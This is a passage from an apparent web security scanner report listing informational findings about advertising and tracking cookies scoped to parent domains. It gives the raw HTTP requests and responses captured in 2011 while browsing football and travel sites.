Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 01-Oct-2013 23:51:22 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

13.61. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p119936314&c3=71054945&c4=43921374&c5=1&c6=1&c7=Sun%20Oct%20%202%2023%3A59%3A13%202011&c8=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome&c9=Official%20Site%20of%20the%20Premier%20League%20-%20Barclays%20Premier%20League%20News%2C%20Fixtures%20and%20Results%20%7C%20Home&c10=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306~2466648%2C00.html&c15=&1317599979190 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 03 Oct 2011 00:01:13 GMT
Connection: close
Set-Cookie: UID=9cc29993-80.67.74.150-1314836282; expires=Wed, 02-Oct-2013 00:01:13 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


13.62. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: V, pb_rtb_ev. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=531292&ev=OO-00000000000000000&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DOO-00000000000000000 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/visitormatch?tag=106934&pid=538936
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr

Response

HTTP/1.1 302 Moved Temporarily
Server: GlassFish v3
CW-Server: cw-app605
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr99f871d6edb7aea19dd0bf8; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:50:17 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|530739.99f871d6ab8391d98e386b3c.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|531292.OO-00000000000000000.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 01-Oct-2012 23:50:17 GMT; Path=/
Location: http://m.xp1.ru4.com/meta?_o=179638&_t=dm&ssv_p=cw&ssv_u=OO-00000000000000000
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 239
Date: Sun, 02 Oct 2011 23:50:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://m.xp1.ru4.com/meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=OO-000000000000
...[SNIP]...

13.63. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: V, cwbh1. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://rs.gwallet.com/r1/pixel/x1743
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app607
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:49:59 GMT; Path=/
Set-Cookie: cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; Domain=.contextweb.com; Expires=Mon, 01-Oct-2012 23:49:59 GMT; Path=/
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

13.64. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: p. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_27838685759&pid=b5bed322-0d4f-f860-f5e9-119078297d65&s=728x90&f=0.2&url=http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D&cid=oxpv1%3A34-632-1929-2300-6511&hrid=2b3668b9fdd43266bb92cfe60a9017d3-1317599506 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1317599506; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27838685759({"r":null});

13.65. http://cas.criteo.com/delivery/admeld_map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/admeld_map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: extid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b HTTP/1.1
Host: cas.criteo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; __utma=94712387.960097846.1316386536.1316386536.1316386536.1; __utmz=94712387.1316386536.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/gif
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP='CUR ADM OUR NOR STA NID'
Set-Cookie: extid=4ec87822-8f33-4202-954a-f6f06a37734b; domain=.criteo.com; expires=Mon, 02-Apr-2012 23:49:03 GMT; path=/
Date: Sun, 02 Oct 2011 23:49:02 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

13.66. http://clk.atdmt.com/go/352348532/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/352348532/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ach00, ach01. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/352348532/direct;ai.209087168;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.cmegroup.com/advance/
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=eb2a/1c72:ec40/2f33:233cf/1a43a:8bff/7db; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b:c766ac0/7db/15006974/8bff/4e89013e; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close


13.67. http://d.agkn.com/iframe!t=1168!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.agkn.com
Path:   /iframe!t=1168!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: uuid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1168!?che=823146&e=x&ent=5797640,69802575,246279115,44069375 HTTP/1.1
Host: d.agkn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sat, 01-Oct-2016 00:09:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 239
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">

</head>

<body style="border: 0; margin:
...[SNIP]...

13.68. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 00:09:11 GMT; Path=/
Content-Type: text/javascript
Content-Length: 0
Date: Mon, 03 Oct 2011 00:09:11 GMT


13.69. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/ HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2966958661410417168

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Sat, 31-Mar-2012 01:52:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 01:52:55 GMT

GIF89a.............!.......,...........D..;

13.70. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 30-Mar-2012 23:49:15 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:49:14 GMT

GIF89a.............!.......,...........D..;

13.71. http://d.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: 1780853-B1781017. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=179638&_t=cmcont&ssv_ptnr=pm HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:54 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1295
X-Cnection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<script type="text
...[SNIP]...

13.72. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ZFFAbh, ZFFBbh. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; FFgeo=5386156; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 01 Jan 2012 00:15:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=1006B826,20|121_977#0;expires=Tue, 02 Oct 2012 00:15:53 GMT;domain=.zedo.com;path=/;
ETag: "3a9d027-de66-4add1b75df1c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=9372
Expires: Mon, 03 Oct 2011 02:52:05 GMT
Date: Mon, 03 Oct 2011 00:15:53 GMT
Connection: close

GIF89a.............!.......,...........D..;
13.73. http://ehg-twi.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: WSS_GW, CTG. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM55040895RD95EN3%3BDM570806C8RA71EN3&hec=1&vjs=HBX0201.03u&vpc=ERR&ec=1&err=Unknown HTTP/1.1
Host: ehg-twi.hitbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%X%@C@C%Xi; CTG=1317474165

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:05 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%X%@Q^^XCC; path=/; domain=.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM55040895RDV6=V1^Q(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)O:ma6r"OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
Set-Cookie: DM570806C8RAV6=V1@%(#X"rz%X%@Q^^XCCr@rQXCz%zrz%"%X%@Q^^XCCz%X%@Q^^XCC"%X%@Q^^XCQ"%X%@Q^^XCCr@rQXC"%z(xB$DTdT:kTxBrGIWaxBiFxB^z7}z)OuKr6%XzA6DTdT:kTHGIWaoF9; path=/; domain=ehg-twi.hitbox.com; expires=Mon, 01-Oct-2012 23:49:05 GMT; max-age=31536000
